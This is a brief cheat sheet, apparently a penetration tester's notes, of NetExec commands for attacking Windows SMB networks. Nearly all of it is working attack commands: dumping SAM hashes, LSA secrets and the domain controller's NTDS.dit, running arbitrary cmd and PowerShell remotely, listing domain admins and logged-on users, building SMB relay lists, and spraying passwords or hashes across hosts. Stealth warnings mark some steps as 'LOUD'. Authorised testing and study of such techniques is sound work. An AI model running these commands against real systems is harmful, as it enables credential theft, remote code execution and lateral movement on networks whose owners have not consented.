NetExec
Find ip/hostname/SMB Signinig/etc:
sudo netexec smb targets.txt
sudo netexec smb targets.txt --gen-relay-list relay.txtEnumerate SAM hashes
sudo netexec smb ip -u user -p 'password' --sam
sudo netexec smb ip -u user -p 'password' --sam --user target-userEnumerate LSA for potential plaintext passwords
sudo netexec smb ip -u user -p 'password' --lsaEnumerate shares
sudo netexec smb ip -u user -p 'password' --sharesPass cmd
sudo netexec smb ip -u user -p 'password' -x 'command'Pass powershell
sudo netexec smb ip -u user -p 'password' -X 'command'Look at domain admins
sudo netexec smb ip -u user -p 'password' -x 'net group "Domain Admins" /domain'Look at logged on users
sudo netexec smb ip -u user -p 'password' --loggedon-usersLook at NTDS.dit
This is LOUD - use it with caution
sudo netexec smb dc-ip -u domain-admin-user -p 'password' --ntdsFind out what machines a user can successfully log onto
This is LOUD - use it with caution
sudo netexec smb targets.txt -u user -p 'password'
sudo netexec smb targets.txt -u user -H 'hash'Last updated